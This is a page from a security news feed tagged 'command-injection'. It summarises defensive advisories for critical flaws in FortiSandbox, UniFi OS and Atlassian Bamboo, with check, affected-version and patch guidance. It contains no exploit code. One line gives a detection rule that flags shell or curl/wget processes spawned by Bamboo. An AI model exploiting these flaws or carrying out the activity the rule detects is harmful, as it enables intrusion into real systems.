Last updated: July 5, 2026 at 9:01 AM UTC
All 557 Vulnerability 199 Breach 106 Threat 245 Defense 7
Tag: command-injection (3 articles)Clear

Critical FortiSandbox flaw lets unauthenticated attackers run commands

Fortinet has patched a critical flaw in FortiSandbox, the appliance that detonates suspicious files and feeds malware verdicts to the rest of a Fortinet security deployment. The bug (CVE-2026-25089, rated 9.8) is an OS command injection in the web interface that lets a remote, unauthenticated attacker run arbitrary commands by sending crafted HTTP requests. Compromising a sandbox is especially dangerous because attackers can both pivot deeper into the network and blind the very system meant to catch malware. Fixed versions are FortiSandbox 5.0.6 and 4.4.9, with matching updates for the Cloud and PaaS editions.

Check
Identify FortiSandbox appliances and their version and whether the web interface is reachable from untrusted networks, and review HTTP and admin logs for unexpected command execution.
Affected
FortiSandbox, FortiSandbox Cloud, and FortiSandbox PaaS web interfaces before the fixed releases (CVE-2026-25089), reachable by remote unauthenticated attackers over HTTP.
Fix
Upgrade FortiSandbox to 5.0.6 or 4.4.9 (and the matching Cloud and PaaS releases) now, and restrict management-interface access to trusted networks until patched.

Ubiquiti patches three max-severity UniFi OS flaws (CVE-2026-34908/34909/34910) plus two more - ~100K endpoints exposed online

Ubiquiti has shipped patches for five UniFi OS vulnerabilities, three of which are CVSS-maximum and exploitable by remote unauthenticated attackers. CVE-2026-34908 is an improper access control that lets attackers make unauthorized changes; CVE-2026-34909 is a path traversal that reaches an underlying system account; CVE-2026-34910 is an unauthenticated command injection. Two additional flaws (CVE-2026-33000, a critical command injection, and CVE-2026-34911, a high-severity info disclosure) were also patched. All five came through Ubiquiti's HackerOne program. Censys is tracking close to 100,000 internet-exposed UniFi OS endpoints, around 50,000 of them in the US. Ubiquiti products were previously hijacked into the GRU-operated Moobot botnet.

Check
Inventory UniFi OS devices (Dream Machine, Cloud Key, UNVR, UCG) and their firmware version. Censys-check your egress IPs for exposed UniFi web interfaces and management ports.
Affected
All UniFi OS Consoles (Dream Machine, Cloud Key, UNVR, UCG) before the May 22 patches. Roughly 100,000 internet-exposed endpoints worldwide, with about 50,000 in the United States.
Fix
Apply Ubiquiti's UniFi OS updates immediately via the Network app or controller. Move management interfaces off the public internet. Restrict admin access to a management VLAN behind VPN.

Atlassian Bamboo Data Center hit with critical OS command injection (CVE-2026-21571, CVSS 9.4) - patch your CI/CD before someone uses it as a supply-chain pivot

Atlassian's April 21 security bulletin disclosed CVE-2026-21571, a critical OS command injection in Bamboo Data Center and Server with CVSS 9.4. An authenticated attacker can execute arbitrary commands on the underlying server, leading to full system compromise and lateral movement. Affected branches: 9.6, 10.0, 10.1, 10.2, 11.0, 11.1, 12.0, 12.1. The same bulletin patches CVE-2026-33871 (CVSS 8.7) - a Netty HTTP/2 DoS that can knock CI/CD pipelines offline. Bamboo sits at the heart of build pipelines, giving attackers a clean path to tamper with artifacts and harvest pipeline secrets.

Check
Inventory every Bamboo Data Center and Server instance you run and upgrade to 12.1.6 LTS, 10.2.18 LTS, or 9.6.25 today.
Affected
Atlassian Bamboo Data Center and Server versions 9.6.0 through 12.1.3 inclusive against CVE-2026-21571 (CVSS 9.4 OS command injection, authenticated). Also exposed to CVE-2026-33871 (CVSS 8.7 DoS via Netty HTTP/2). The authenticated requirement is small comfort - any leaked or shared technician credential is enough.
Fix
Upgrade to Bamboo 12.1.6 LTS, 10.2.18 LTS, or 9.6.25. Audit Bamboo accounts and disable shared logins; require MFA on every Bamboo auth path. Alert on shell interpreters or curl/wget spawning from the Bamboo Java process. Restrict the admin UI to internal networks. Rotate every credential stored in build configurations - they could have been read during the vulnerable window.